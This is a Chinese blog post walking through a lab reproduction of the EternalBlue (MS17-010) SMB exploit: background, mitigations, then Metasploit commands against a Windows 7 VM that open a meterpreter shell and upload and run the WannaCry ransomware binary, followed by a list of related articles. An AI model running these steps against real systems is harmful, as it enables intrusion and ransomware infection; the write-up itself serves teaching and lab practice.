永恒之蓝全过程复现

2023-10-27

一,永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二,漏洞原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

三,SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

四,漏洞防御

1.禁用SMB1协议

2.打开Windows Update,或手动安装补丁

3.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接

4.不要随意打开陌生的文件,链接

5.安装杀毒软件,及时更新病毒库

6.暂时关闭Server服务。

五,实验环境:Win7(靶机)和Kali Linux(攻击机);

1.准备靶机:Win7 64位 (IP: 192.168.227.136)--用ipconfig进行查询,实验前关闭win7防火墙(在win7的所有程序中的控制面板中设置)

2.准备攻击机:Kali 64位 (IP:192.168.227.132)--用ifconfig进行查询

3.保证两个虚拟机可以ping通

六,漏洞复现

1.检测靶机主机和端口

使用nmap对靶机端口服务进行扫描,检测目标主机是否存活,以及445端口开放情况

nmap 192.168.227.136

可以看到:目标主机存活(host is up),且445端口开放

2.打开kail自带的Metasploit渗透工具

(Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端)

msfconsole

3、输入永恒之蓝漏洞编号

永恒之蓝漏洞编号为ms17-010

search ms17-010

可以看到返回了多条可利用的漏洞模块信息,永恒之蓝用到的是第3个和第0个。第3个是用来进行扫描的,扫描在这个网段里面哪一个主机是有这个漏洞的(scanner扫描器),第0个是永恒之蓝的攻击模块。

4.使用第3个扫描器进行辅助扫描测试

use auxiliary/scanner/smb/smb_ms17_010

5.查看该漏洞模块所需的参数情况

show options

结果展示:其中required下方显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

我们重点关注以下2个参数配置,哪个参数有问题就设置哪个:

RHOST(被攻击的目标地址-靶机地址);

RPORT(被攻击目标地址的端口-保证445端口开放);

6、设置靶机地址

由上图可知:只有RHOST未设置,其他参数均以自动获取,没有问题。所以我们只需设置靶机位置即可

set RHOST 192.168.227.136

7、进行检验

show options

检验后无误即可进行下一步操作

8、发起攻击

run

显示“Host is likely VULNERABLE to MS17-010”-该主机很容易受到ms17-010的攻击,可以断定靶机存在永恒之蓝漏洞。

9、再次查看永恒之蓝漏洞

search ms17-010 

10、进入0模块,进行攻击

use exploit/windows/smb/ms17_010_eternalblue

11、查看参数配置情况

show options

重点关注以下5个参数设置,哪个有问题就设置哪个

1.Payload(攻击载体) ;

2.RHOST(被攻击的目标地址-靶机ip);

3.RPORT(被攻击目标地址的端口-保证445开放);

4.LHOST(发起攻击的地址-kali的ip);

5.LPORT(发起攻击的端口-默认即可);

发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取且正确

12、设置RHOST

set RHOST 192.168.227.136

13、再次检查

show options

检查无误

14,发起攻击

run

显示meterpreter >表明攻击成功 两个电脑已经建立了一个会话连接

15,进入靶机shell

shell

若有乱码,输入chcp 65001即可

16,将wcry勒索病毒解压至kail的root文件夹下

17,上传wcty.exe至靶机c盘

upload /root/wcry.exe c://wcry.exe

若输入该命令无效,可在写完upload后按空格 将上图中的wcry.exe拉入命令行(本人是这么做的)

18,运行wcry.exe

excute -f c://wcry.exe

运行成功

19,查看靶机

攻击完成!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

永恒之蓝全过程复现 的相关文章

  • 【CTF必看】从零开始的CTF学习路线(超详细),让你从小白进阶成大神!

    最近很多朋友在后台私信我 问应该怎么入门CTF 个人认为入门CTF之前大家应该先了解到底 什么是CTF 而你 学CTF的目的又到底是什么 其次便是最好具备相应的编程能力 若是完全不具备这些能力极有可能直接被劝退 毕竟比赛的时候动不动写个脚本
  • 5个步骤,教你瞬间明白线程和线程安全

    记得今年3月份刚来杭州面试的时候 有一家公司的技术总监问了我这样一个问题 你来说说有哪些线程安全的类 我心里一想 这我早都背好了 稀里哗啦说了一大堆 他又接着问 那你再来说说什么是线程安全 然后我就GG了 说真的 我们整天说线程安全 但是对
  • 2种方法,教你使用Python实现接口自动化中的参数关联

    通常在接口自动化中 经常会参数关联的问题 那么什么是参数关联 参数关联就是上一个接口的返回值会被下一个接口当做参数运用 其中Python中可以实现参数关联的方法有很多种 今天小编给大家介绍下 如何通过Python来实现接口自动化中的参数关联
  • RF自动化环境安装+自动化实例解析

    RF定义 通用型的 自动测试框架 绝大部分的软件的的自动化系统都可以采用它 特点 测试数据文件 Test Data 对应一个个的测试用例 测试数据文件里面使用的功能小模块叫关键字 由测试库 Test Library Robot Framew
  • 2024年金三银四网络安全考试试题

    2023年金三银四网络安全考试试题 1 关于数据使用说法错误的是 A 在知识分享 案例中如涉及客户网络数据 应取敏感化 不得直接使用 B 在公开场合 公共媒体等谈论 传播或发布客户网络中的数据 需获得客户书面授权或取敏感化 公开渠道获得的除
  • Python爬虫实战:IP代理池助你突破限制,高效采集数据

    当今互联网环境中 为了应对反爬虫 匿名访问或绕过某些地域限制等需求 IP代理池成为了一种常用的解决方案 IP代理池是一个包含多个可用代理IP地址的集合 可以通过该代理池随机选择可用IP地址来进行网络请求 IP代理池是一组可用的代理IP地址
  • 【信道估计】【MIMO】【FBMC】未来移动通信的滤波器组多载波调制方案(Matlab代码实现)

    欢迎来到本博客 博主优势 博客内容尽量做到思维缜密 逻辑清晰 为了方便读者 座右铭 行百里者 半于九十 本文目录如下 目录 1 概述 2 运行结果 3 参考文献 4 Matlab代码及文章
  • 【网络安全】Facebook代码执行实现命令执行、敏感信息泄露

    部分网站开设编码练习 若安全配置不当 则代码执行将升级为操作系统命令注入 导致敏感信息泄露 本文仅分享命令执行相关知识 不承担任何由于传播 利用本文所发布内容而造成的任何后果及法律责任 未经许可 不可转载 文章目录 信息泄露 扩大危害 信息
  • 步骤详图 教你在linux搭建容器环境

    警告 切勿在没有配置 Docker YUM 源的情况下直接使用 yum 命令安装 Docker 1 准备工作 系统要求 要安装Docker CE 社区版 操作系统的最低要求是CentOS7 7以下版本都不被支持 卸载旧版本 Docker改版
  • 【网安神器篇】——WPScan漏洞扫描工具

    目录 一 Wordpress简介 二 WPScan介绍 三 安装 四 获取token 1 注册账号 2 拿到token 五 使用教程 1 常用选项 2 组合命令 1 模糊扫描 2 指定扫描用户 3 插件漏洞扫描 4 主题漏洞扫描 5 Tim
  • HPE Aruba Networking:五大网络现代化策略助力实现校园数字化转型

    作者 Aruba中国区技术销售总监 俞世丹 全球数字化进程日益加深 科技已成为加速教育行业发展的重要驱动力 人工智能 大数据 云计算 物联网 虚拟现实等新兴技术的快速发展 正在深刻改变着教育的形态和模式 为了更好地满足学校师生个性化教育教学
  • socket网络编程几大模型?看看CHAT是如何回复的?

    CHAT回复 网络编程中常见的有以下几种模型 1 阻塞I O模型 Blocking I O 传统的同步I O模型 一次只处理一个请求 2 非阻塞I O模型 Non blocking I O 应用程序轮询调用socket相关函数检查请求 不需
  • 基于java的物业管理系统设计与实现

    基于java的物业管理系统设计与实现 I 引言 A 研究背景和动机 物业管理系统是指对物业进行管理和服务的系统 该系统需要具备对物业信息 人员信息 财务信息等进行管理的能力 基于Java的物业管理系统设计与实现的研究背景和动机主要体现在以下
  • 什么是充放电振子理论?

    CHAT回复 充放电振子模型 Charging Reversal Oscillator Model 是一种解释ENSO现象的理论模型 这个模型把ENSO现象比喻成一个 热力学振荡系统 在这个模型中 ENSO现象由三个组成部分 充电 Char
  • Kubernetes (十二) 存储——Volumes配置管理

    一 卷的概念 官方地址 卷 Kubernetes https v1 24 docs kubernetes io zh cn docs concepts storage volumes 二 卷的类型及使用 emptyDir卷 1 创建编辑文件
  • 服务器VPS是什么意思?一文了解其含义与重要性

    在今天的数字时代 服务器扮演着至关重要的角色 它们是网站 应用程序和在线业务的基石 但是 你是否听说过VPS 本文将深入探讨什么是服务器VPS 以及为什么它在今天的互联网世界中如此重要 什么是服务器VPS 服务器的基本概念 在我们深入探讨V
  • GitLab CI 实现项目A更新代码自动触发项目B更新错误码文档

    一 CI CD简介 CI CD 是持续集成 Continuous Integration 和持续交付 持续部署 Continuous Delivery Continuous Deployment 的缩写 是一种软件开发和交付的最佳实践 这两
  • 【网络安全】——区块链安全和共识机制

    区块链安全和共识机制 摘要 区块链技术作为一种分布式去中心化的技术 在无需第三方的情况下 使得未建立信任的交易双方可以达成交易 因此 区块链技术近年来也在金融 医疗 能源等多个行业得到了快速发展 然而 区块链为无信任的网络提供保障的同时 也
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • MFC框架机制详解

    MFC框架机制详解 1 1 Windows消息机制要点 1 1 1 窗口过程 每个窗口会有一个称为窗口过程的回调函数 WndProc 它带有四个参数 分别为 窗口句柄 Window Handle 消息ID Message ID 和两个消息参
  • VS2017登陆失败:我们无法刷新此账户的凭证、我们无法添加此账户发送请求时出错、评估期已结束,请登录以解除产品锁定

    一 问题 点击登录后会显示如下窗口 忘了截图 图片截于 35条消息 Visual Studio 2017无法登录问题解决 kellyjucy的博客 CSDN博客 vs2017无法登陆 二 解决方法 我试过以下博主的第一 二个方法 但是我还是
  • TCO(总所有成本)

    一 引言 总所有成本TCO Total cost of ownership 是一种公司经常采用的技术评价标准 它的核心思想是在一定时间范围内所拥有的包括置业成本 acquisition cost 和每年总成本在内的总体成本 在某些情况下 这
  • Not registered via @EnableConfigurationProperties, marked as Spring component.........

    Not registered via EnableConfigurationProperties marked as Spring component or scanned via ConfigurationPropertiesScan 错
  • 星星之火-28:什么是CDMA的远近效应与功率控制?

    1 什么是功率远近效应与功率控制 移动通信是在运动过程中进行的 移动台之间会出现近处移动台干扰远处移动台的现象 称为远近效应 对于频分多址与时分多址的系统 远近效应并不是那么明显 然而码分多址 同一小区内的所有的用户 他们的载频的频率是相同
  • 时间操作之lubridate包

    目录 加载lubridate lubridate包有5个字母 y m d h m s 用5个字母创建一个时间向量 筛选时间 加载lubridate 加载包 library lubridate lubridate包有5个字母 y m d h
  • 阿里云ecs共享型s6怎么样,带宽操作系统选择区别?

    不错的 基本是一个主流和入门级别的阿里云ecs服务器 满足我们的一般个人和初创企业的建站需求的 价格便宜 性价比高 独立服务器不是和别人共享的 独立公网IP 不影响SEO 共享型实例采用非绑定CPU调度模式 每个vCPU会被随机分配到任何空
  • 如何在MySQL存储过程中保留注释

    如何在MySQL存储过程中保留注释 本来在MySQL的Store Procedure 里添加注释很简单 可惜如果用命令行客户端来导入备份的数据 注释就会被干掉 在存储过程BODY里面添加注释 解决办法 99999 Write your co
  • leetcode第88题“非递减顺序排列“是什么意思?

    我在遇到这个词的时候 确实是影响到了我对题目意思的判断 后来查清楚了 分享 给大家这个小知识点 非递减顺序排列即是指 数列递减 但不是单调递减 中间可以有重复 比如 8 6 6 3 2 1 1 2 3 4 5 递增排列 9 8 7 6 5
  • 如何识别linux是多少位,如何查看linux版本 如何查看LINUX是多少位

    1 查看内核版本命令 1 root q1test01 cat proc version Linux version 2 6 9 22 ELsmp bhcompile crowe devel redhat com gcc version 3
  • js浏览器兼容性的写法

    大致有以下五大类 1 元素查找问题2 DOM操作3 事件4 语法5 XML 一 元素查找问题 1 document all name 1 现有问题 Firefox不支持document all name 2 解决方法 使用getElemen
  • vue3实现卡片翻牌

    vue3实现塔罗牌翻牌 前言 一 操作步骤 1 布局 2 操作 3 样式 总结 前言 最近重刷诡秘之主 感觉里面的塔罗牌挺有意思 于是做了一个简单的塔罗牌翻牌动画 vue3 vite ts 一 操作步骤 1 布局 首先我们定义一个整体的塔罗
  • 基于阿里云服务器+libevent+Qt+mysql+Json等实现仿qq聊天软件

    文章目录 前言 一 在linux上实现服务器端chat server开发 1 1 配置服务器端开发环境 1 2 创建服务器与客户端接口文档 1 3 封装数据库类和链表类 用于存储用户和群聊信息 1 4 封装一个服务器类class Serve
  • XCode 7上传遇到ERROR ITMS-90535 Unexpected CFBundleExecutable Key. 的解决办法

    找到腾讯的info plist 删除箭头指向的一行 重新打包 上传
  • EmbedFire i.MX 6ull开发板学习笔记(八)---使用mfgtools烧录固件

    EmbedFire i MX 6ull开发板学习笔记 八 使用mfgtools烧录固件 一 mfgtools使用介绍 二 改造mfgtools 三 其他问题 之前为了调试方便 一直是将uboot烧录进SD卡 从SD卡启动 然后通过局域网下载
  • 零基础学习OSI七层网络模型

    目录 1 应用层 2 物理层 3 数据链路层
  • angular测试API

    1 resetTestEnvironment 是 Angular 测试中的一个函数 用于重置测试环境 它通常与 initTestEnvironment 和 platformBrowserDynamicTesting 一起使用 以确保在多个测
  • 构建安全的数据访问-威胁与对策(一)

    威胁与对策 要构建安全的数据访问代码 需要了解数据访问代码中的威胁是什么 常见漏洞是如何产生的以及如何使用适当的对策来降低风险 数据访问代码面临的主要威胁包括 SQL 注入 配置数据的泄漏 敏感应用程序数据的泄漏 数据库架构和连接详细信息的
  • 安装配置minicom

    安装配置minicom lsmod grep usbserial 如果直接使用串口线 而没有用到USB转串口设备 此步可以跳过 如果有usbserial 说明系统支持USB转串口 安装minicom Fedora自带有minicom 此步可
  • 永恒之蓝全过程复现

    一 永恒之蓝简介 永恒之蓝是指2017年4月14日晚 黑客团体Shadow Brokers 影子经纪人 公布一大批网络攻击工具 其中包含 永恒之蓝 工具 永恒之蓝 利用Windows系统的SMB漏洞可以获取系统最高权限 5月12日 不法分子